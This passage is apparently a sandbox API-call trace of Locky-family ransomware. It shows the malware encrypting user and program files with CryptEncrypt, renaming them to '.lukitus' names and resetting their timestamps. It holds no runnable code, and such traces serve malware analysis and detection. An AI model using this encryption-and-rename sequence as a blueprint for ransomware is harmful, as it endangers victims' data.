hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0110.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0110.876] CreateFileW (lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.876] GetLastError () returned 0x20 [0110.876] RaiseException (dwExceptionCode=0xe06d7363, dwExceptionFlags=0x1, nNumberOfArguments=0x3, lpArguments=0x281f558) [0110.876] GetLastError () returned 0x20 [0110.876] SetLastError (dwErrCode=0x20) [0110.876] RtlUnwind (TargetFrame=0x281fcac, TargetIp=0x40148b, ExceptionRecord=0x281f028, ReturnValue=0x0) [0110.876] GetLastError () returned 0x20 [0110.876] SetLastError (dwErrCode=0x20) [0110.876] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] GetLastError () returned 0x20 [0110.877] SetLastError (dwErrCode=0x20) [0110.877] CreateFileW (lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x324 [0110.877] CreateFileW (lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\F56924BE-9663-41BB-E502C16E-31B2BDF7F726.lukitus" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\f56924be-9663-41bb-e502c16e-31b2bdf7f726.lukitus"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x328 [0110.878] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0110.878] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0110.882] ReadFile (in: hFile=0x324, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x75000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x75000, lpOverlapped=0x0) returned 1 [0110.921] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x75000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x75000, lpOverlapped=0x0) returned 1 [0110.925] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.925] FlushFileBuffers (hFile=0x328) returned 1 [0110.930] CreateFileW (lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0x40000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0110.935] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x281f494 | out: lpFileSize=0x281f494*=479232) returned 1 [0110.935] WriteFile (in: hFile=0x324, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x75000, lpNumberOfBytesWritten=0x281f4a8, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f4a8*=0x75000, lpOverlapped=0x0) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.937] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f4a4 | out: pbBuffer=0x281f4a4) returned 1 [0110.938] MoveFileExW (lpExistingFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\40EEB5158C34DEBD2CB4E1B03CE6FB8A.tmp" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\40eeb5158c34debd2cb4e1b03ce6fb8a.tmp"), dwFlags=0x8) returned 0 [0110.938] DeleteFileW (lpFileName="c:\\ProgramData\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\programdata\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf")) returned 0 [0110.938] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Database1.accdb" (normalized: "c:\\users\\aetadzjz\\documents\\database1.accdb"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x548bc6b0, ftCreationTime.dwHighDateTime=0x1d2f183, ftLastAccessTime.dwLowDateTime=0x5547d350, ftLastAccessTime.dwHighDateTime=0x1d2f183, ftLastWriteTime.dwLowDateTime=0x91628b50, ftLastWriteTime.dwHighDateTime=0x1d2f183, nFileSizeHigh=0x0, nFileSizeLow=0x58000)) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.938] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0110.939] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0110.939] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Database1.accdb" (normalized: "c:\\users\\aetadzjz\\documents\\database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0110.939] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Database1.accdb" (normalized: "c:\\users\\aetadzjz\\documents\\database1.accdb"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-3E83206B-222A0EAE7C38.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-3e83206b-222a0eae7c38.lukitus"), dwFlags=0x9) returned 1 [0110.940] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0110.940] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0110.945] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x58000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x58000, lpOverlapped=0x0) returned 1 [0110.953] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0110.953] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x58000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x58000, lpOverlapped=0x0) returned 1 [0110.954] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.954] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6627e450, dwHighDateTime=0x1d31760)) [0110.954] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0110.954] FlushFileBuffers (hFile=0x328) returned 1 [0110.962] GetFileAttributesExW (in: lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdobeARM.bin" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adobearm.bin"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x93fa3960, ftCreationTime.dwHighDateTime=0x1d2f18a, ftLastAccessTime.dwLowDateTime=0x93fa3960, ftLastAccessTime.dwHighDateTime=0x1d2f18a, ftLastWriteTime.dwLowDateTime=0x93fa3960, ftLastWriteTime.dwHighDateTime=0x1d2f18a, nFileSizeHigh=0x0, nFileSizeLow=0x5d60c)) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0110.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0110.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0110.963] CreateFileW (lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdobeARM.bin" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adobearm.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0110.963] MoveFileExW (lpExistingFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdobeARM.bin" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adobearm.bin"), lpNewFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\F56924BE-9663-41BB-D8BE3C5C-B36FD1B73B13.lukitus" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\f56924be-9663-41bb-d8be3c5c-b36fd1b73b13.lukitus"), dwFlags=0x9) returned 1 [0110.969] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0110.969] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0110.974] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5d60c, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5d60c, lpOverlapped=0x0) returned 1 [0110.985] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0110.985] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5d60c, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5d60c, lpOverlapped=0x0) returned 1 [0110.985] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0110.985] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x662ca710, dwHighDateTime=0x1d31760)) [0110.985] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0110.986] FlushFileBuffers (hFile=0x328) returned 1 [0110.999] SetFileAttributesW (lpFileName="c:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\F56924BE-9663-41BB-D8BE3C5C-B36FD1B73B13.lukitus", dwFileAttributes=0x80) returned 1 [0111.000] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\sikvnb huvuib.contact"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713ad6e0, ftCreationTime.dwHighDateTime=0x1d2fb2c, ftLastAccessTime.dwLowDateTime=0x713ad6e0, ftLastAccessTime.dwHighDateTime=0x1d2fb2c, ftLastWriteTime.dwLowDateTime=0x713ad6e0, ftLastWriteTime.dwHighDateTime=0x1d2fb2c, nFileSizeHigh=0x0, nFileSizeLow=0x494)) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0111.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0111.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0111.000] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0111.001] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\aetadzjz\\contacts\\sikvnb huvuib.contact"), lpNewFileName="c:\\Users\\aETAdzjz\\Contacts\\F56924BE-9663-41BB-75322EBB-BE90A9784F44.lukitus" (normalized: "c:\\users\\aetadzjz\\contacts\\f56924be-9663-41bb-75322ebb-be90a9784f44.lukitus"), dwFlags=0x9) returned 1 [0111.002] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0111.002] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, 